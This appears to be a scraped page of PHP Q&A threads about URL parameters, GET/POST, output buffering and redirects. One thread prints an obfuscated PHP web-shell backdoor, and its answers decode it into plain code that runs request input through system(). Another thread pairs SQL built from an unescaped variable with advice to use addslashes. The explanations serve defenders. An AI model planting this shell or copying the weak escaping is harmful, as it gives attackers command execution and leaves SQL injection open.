I want to have a variable that contain url address such as this example
when I open http://localhost/test?alfa=b&bravo=c#question=Z
I want to print on my web the "question=Z"
I try to get by using REQUEST_URI
$url=$_SERVER['REQUEST_URI'];
The browser just show "/test?alfa=b&bravo=c" without "question=Z"
Could somebody helped me with this issue?
Thanks Before
After research on php and java, I can get the #hashtag by combine php n java
here put javascript :
<script type="text/javascript">
var test = window.location.hash.replace("#","$");
document.cookie = 'tag=' + test;
</script>
And last, put this php to take the variable
<?php
$hashtag = $_COOKIE["tag"]; $hashtag = substr($hashtag,11,1000);
?>
I put 1000 because I limit the input question max 1000 character
Maybe you just made an error and what you actually mean is:
http://localhost/test?alfa=b&bravo=c&question=Z
Then your error would just be a typo.
Otherwise, there is no solution to that. Everything including and bafter the # is never actually transmitted to the server. It is evaluated locally on the browser.
The Server only sees the Domain, the URI and teh query string.
Regards,
Stefan
use this kind of URL
http://localhost/test?alfa=b&bravo=c&question=Z
then in php you can catch them by
$alfa = $_GET['alfa'];
$bravo = $_GET['bravo'];
$question = $_GET['question'];
to catch
<?php
if( $_GET["alfa"] || $_GET["bravo"] )
{
echo "I'm ". $_GET['alfa']. "<br />";
echo "I'm ". $_GET['bravo'];
exit();
}
?>
or
<?php
if( !empty($alfa) || !empty($bravo) )
{
echo "I'm ". $alfa. "<br />";
echo "I'm ". $bravo;
exit();
}
?>
About GET
The GET method produces a long string that appears in your server
logs, in the browser's Location: box.
The GET method is restricted to send upto 1024 characters only.
Never use GET method if you have password or other sensitive
information to be sent to the server.
GET can't be used to send binary data, like images or word
documents, to the server.
The data sent by GET method can be accessed using QUERY_STRING
environment variable.
The PHP provides $_GET associative array to access all the sent
information using GET method.
PHP - GET & POST Methods
HTTP Methods: GET vs. POST
Related
Im working with so called webhooks. What basically happens is. There's a process happening in the background and when that process finishes it will send a POST request to an URL that I have to specify. For example 'www.bla/process.php'.
The post request that is sent will have a body of data. My question is , is it possible to read the data that is sent and just print it out for example?
Yes
It is possible to pass info from one page to another and print it out for example.
There are many method's...
// THE SAME
echo $_POST['DATA1'];
echo ($_POST['DATA1']);
// THE SAME
// IF = DATA IS SET AND NOT EMPTY
if (isset($_POST['DATA1']) && !empty($_POST['DATA1'])) {
$DATA1 = $_POST['DATA1'];
}
echo($DATA1);
I'm currently using Chatfuel to open the index.php-file of my website which sends the user the html code into his browser. There he can register and set up his account.
An example URL might look like this:
https://my.domain.com?key_value='123456789'
Depending on if that user is a new or a existing one, I wanna present him with a different form. In order to check so, I do a simple query to the MySQL db and see if the passed on key_value is already in the db and safe true or false to a boolean. Stating the obvious: If hes not an existing user, the 'empty' form with no values should show up. If he is registered he should see the information he filled in from last time.
My idea:
At the top of my index.php I do the check whether he's an existing customer or not (Note: This is working already). Then I want to use outputbuffering to alter the html-code depending on the boolean, before it is sent to the client.
My problem:
I developed the blueprint of the website in plain html (see code below). And OB only catches it as output if its within a string. Since I use " as well as ' in the document the string gets interrupted every few lines. Is there a simple workaround to this? Because the OB function is unable to access anything within the <html>...</html> tags.
Or do i need to use redirecting after the check (in my index.php) and create a separate form + script for both edit customer data and add new customer data?
<?php
//Connection stuff
// Prepare statment: !TODO: string needs to be escaped properly first
$query_string = "SELECT * FROM tbl_customer WHERE unique_url = '$uniqueurl'";
$query_rslt = mysqli_query($conn, $query_string);
if($query_rslt == FALSE)
{
// Failure
echo "<br> Oops! Something went wrong with the querying of the db. " . $conn->connect_error;
//Handle error
}
else
{
if ($query_rslt->num_rows > 0)
{
// Set boolean
$existing_customer = TRUE;
// Create an array called row to store all tuples that match the query string
while($row = mysqli_fetch_assoc($query_rslt)) {
//...
}
}
}
// Custom post processing function
function ob_postprocess($buffer)
{
// do a fun quick change to our HTML before it is sent to the browser
$buffer = str_replace('Testing', 'Working', $buffer);
// Send $buffer to the browser
return $buffer;
}
// start output buffering at the top of our script with this simple command
// we've added "ob_postprocess" (our custom post processing function) as a parameter of ob_start
if (!ob_start('ob_postprocess'))
{
// Failure
echo "<br> Oops! Something went wrong with output buffering. Check that no HTML-Code is sent to client before calling this start function.";
// Handle error
}
else
{
// Success
// This is where the string should get accessed before sending to the client browser
echo "Testing OB.";
}
?>
<!--DOCTYPE html-->
<html lang="en">
<head>
<meta charset="utf-8">
//...
</body>
</html>
<?php
// end output buffering and send our HTML to the browser as a whole
ob_end_flush();
?>
Output: "Working OB."
EDIT: I added source code example. This code won't compile.
Since, i can't comment, so i'll put some of my question here.
I dont really get the point, but give me a try, are you mean escaping string? you can use backslashes \ to escape string.
Like this "select from ".$dbname." where id = \"".$id."\"".
You can easily using addslashes($var) before adding the variable to the sql. like this
$id = addslashes($_POST['id']);
$sql = "select form db where id = '$id'";
If you mean checking the existent of the user to select which form to show in the page, why dont you do this?
if(userCheck()) {
?>
// here write the html code if user passed
<?php
} else {
?>
// here write the html code if user not passed
<?php
}
You can put userCheck() as global function or whereever you place it, as long as you can use it when you want to check the user before showing the form.
tl;dr: The thing I was looking for was a combination of file_get_contents() and object buffering.
file_get_contents() returns a string of a plain html-file of your choice. I could post a ton of explanation here or simply link you to phppot.com. The article offers you a directly executable demo with source (Download here). In case you wanna try it with a html file of yours, simply change the file path.
So once the whole html was converted into a string, I used the postprocessing function of OB to alter the string (= basically my html) if it's an existing user that came to alter his data. Then all the html-code (in a string still at this point) is sent to the client using ob_end_flush(). I will put up the actual code asap :)
$num = $_POST['num'];
if(filter_input(INPUT_POST,'num', FILTER_VALIDATE_INT, array("options"=>array("min_range"=>5, "max_range"=>20)))===false) {
echo "Write a valid number between 5 and 20";
} else {
echo 'Great, your number is: '.$num;
}
there are many verbs you can use to send information between your website and your app, perhaps the most commonly used are GET and POST, GET requests are the ones that you can see on the URL, usually they come after a ? symbol, POST requests on the other hand are not shown on the URL, but the data is sent "hidden", in this case you can see you're using:
$num = $_POST['num']
if it is working is because in your HTML page, or on the same PHP page you have something like
<form action="mypage.php" method="post">
so, you can get that info via _POST, not _GET, the method/verb used must match on both sides.
If you try to get the value on _GET it won't be available, so the filter will fail check on http://php.net/filter_input, it clearly states:
or NULL if the variable_name variable is not set
you are performing a === comparison that won't return false, but NULL in this case, and therefor the only available code to be executed is the else part!
Someone hacked my site and included this code. Could someone explain what it does?
I've reformatted the spacing for better clarity. I've tried running the code but it looks like all it does is return an md5 hash. Is this harmless?
<?
$GLOBALS['_131068239_']=Array(
base64_decode('bWQ' .'1'),
base64_decode('' .'dXJsZGV' .'jb' .'2Rl'),
base64_decode('dX' .'JsZGVjb2Rl'),
base64_decode('c3lz' .'dGVt'));
?>
<? function
_787708145($i)
{
$a=Array(
'MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=',
'cA==',
'cw==',
'');
return base64_decode($a[$i]);
}
?>
<?php
$_0=_787708145(0);
$_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));
if($_1!=$_0)exit;
$_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]);
if($_2==_787708145(3))exit;
$GLOBALS['_131068239_'][3]($_2);exit;
?>
Answer inline in the code comments below.
In short the script allows a shell to be either written or uploaded to your server.
Later edit: definitely not harmless, burn it with fire.
<?php
$GLOBALS['_131068239_']=Array(
base64_decode('bWQ' .'1'), // md5 - php function
base64_decode('' .'dXJsZGV' .'jb' .'2Rl'), // urldecode - php function
base64_decode('dX' .'JsZGVjb2Rl'), //urldecode - php function
base64_decode('c3lz' .'dGVt')); //system - php function
function _787708145($i)
{
$a=Array(
'MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=',
'cA==',
'cw==',
'');
return base64_decode($a[$i]);
}
$_0=_787708145(0); // md5 hash 2caf6917ca3d9a3a85d26029ed623b1a
$_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));
// this is a function call md5(urldecode($_REQUEST[p]))
// this script is passed an url as a get or post parameter and getting md5 encoded
if($_1!=$_0)exit; // the md5 hash is compared here with the hash above
$_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]);
// another function call, urldecode($_REQUEST[s])
// another parameter is passed
if($_2==_787708145(3))exit; // if the urldecode above == blank then exit
$GLOBALS['_131068239_'][3]($_2);
// execute system function with the "s" parameter, system(s)
// basically writing a shell on your server here
exit;
// job done, exit :)
Not harmless. This is the code with the obfuscation stuff removed:
$_0 = '2caf6917ca3d9a3a85d26029ed623b1a';
$_1 = md5(urldecode($_REQUEST['p']));
if ($_1 != $_0) exit;
$_2 = urldecode($_REQUEST['s']);
if ($_2 == '') exit;
system($_2);
exit;
If this is present in a PHP file on your server, it means that a malicious user can craft an URL with p and s parameters, in order to execute any program on your server (using the system call) with the privileges of the user running your webserver.
I would advice you to get rid of this.
Yes, the above code is a backdoor. It requests the user a system command & this code executes that command on your server. Here is what the above code does!!
<?
// Here all the strings are base64 encoded
$GLOBALS['_131068239_']=Array(
base64_decode('bWQ' .'1'), // md5
base64_decode('' .'dXJsZGV' .'jb' .'2Rl'), // urldecode
base64_decode('dX' .'JsZGVjb2Rl'), // urldecode
base64_decode('c3lz' .'dGVt')); // system - syntax to execute PHP on the server
?>
In the above code, system is used to execute command on your server
<? function _787708145($i) // Function Created
{
$a=Array(
'MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE=', // MD5 string 2caf6917ca3d9a3a85d26029ed623b1a
'cA==', // p
'cw==', // s
'');
return base64_decode($a[$i]);
}
?>
Above is the function created
<?php
$_0=_787708145(0);
$_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));
if($_1!=$_0)exit;
$_2=$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]);
if($_2==_787708145(3))exit;
$GLOBALS['_131068239_'][3]($_2);exit;
?>
This line
$_1=$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]));
_787708145(1) : p
So $_REQUEST[_787708145(1)]) will asking for user to enter parameter with value with p parameter name
$GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)]) : urlencode($_REQUEST["p"])
$GLOBALS['_131068239_'][0]($GLOBALS['_131068239_'][1]($_REQUEST[_787708145(1)])) : md5(urlencode($_REQUEST["p"]))
It will match the password if($_1!=$_0)exit;
$GLOBALS['_131068239_'][2]($_REQUEST[_787708145(2)]); : urlencode($_REQUEST["s"]);
if($_2=="s")exit;
Now comes the final part i.e.
$GLOBALS['_131068239_'][3]($_2); : system($_2); // $_2 is the value supplied by the user to execute command
Decoding the base64 strings:
bWQ1 is md5
dXJsZGVjb2Rl is urldecode
c3lzdGVt is system
MmNhZjY5MTdjYTNkOWEzYTg1ZDI2MDI5ZWQ2MjNiMWE= is 2caf6917ca3d9a3a85d26029ed623b1a
dXJsZGVjb2Rl is urldecode
cA== is p
cw== is s
dXJsZGVjb2Rl is urldecode
This should provide some insight into the aim of the obfuscated code.
I had a virus all over my WordPress server which included the same md5 encoded key. I posted about it here. It was heavily obfuscated, but below is the fully-decoded virus. They ran the code inside eval() which was inside create_function().
create_function() is depreciated as of PHP 7.2, so upgrading your server's PHP will prevent this from happening again. In my case the backdoor was in every functions.php file on my server, across two websites and every WordPress theme, whether in use or not.
$c = "2caf6917ca3d9a3a85d26029ed623b1a";
$p = md5(urldecode($_REQUEST["p"]));
if ($p != $c) exit;
$s = urldecode($_REQUEST["s"]);
if ($s == "") exit;
system($s);
exit;
I've also been having email troubles, so I suspect they were running programs to send spam.
I'm building an "away"-page for my website and when a user posted a link to another website, each visitor clicking that link will be redirected first to the away.php file with an info that I am not responsible for the content of the linked website.
The code in away.php to fetch the incoming browser URI is:
$goto = $_GET['to'];
So far it works, however there's a logical issue with dynamic URIs, in example:
www.mydomain.com/away.php?to=http://example.com
is working, but dynamic URIs like
www.mydomain.com/away.php?to=http://www.youtube.com/watch?feature=fvwp&v=j1p0_R8ZLB0
aren't working since there is a & included in the linked domain, which will cause ending the $_GET['to'] string to early.
The $goto variable contains only the part until the first &:
echo $_GET['to'];
===> "http://www.youtube.com/watch?feature=fvwp"
I understand why, but looking for a solution since I haven't found it yet on the internet.
Try using urlencode:
$link = urlencode("http://www.youtube.com/watch?feature=fvwp&v=j1p0_R8ZLB0") ;
echo $link;
The function will convert url special symbols into appropriate symbols that can carry data.
It will look like this and may be appended to a get parameter:
http%3A%2F%2Fwww.youtube.com%2Fwatch%3Ffeature%3Dfvwp%26v%3Dj1p0_R8ZLB0
To get special characters back (for example to output the link) there is a function urldecode.
Also function htmlentities may be useful.
You can test with this:
$link = urlencode("http://www.youtube.com/watch?feature=fvwp&v=j1p0_R8ZLB0") ;
$redirect = "{$_SERVER['PHP_SELF']}?to={$link}" ;
if (!isset($_GET['to'])){
header("Location: $redirect") ;
} else {
echo $_GET['to'];
}
EDIT:
Ok, I have got a solution for your particular situation.
This solution will work only if:
Parameter to will be last in the query string.
if (preg_match("/to=(.+)/", $redirect, $parts)){ //We got a parameter TO
echo $parts[1]; //Get everything after TO
}
So, $parts[1] will be your link.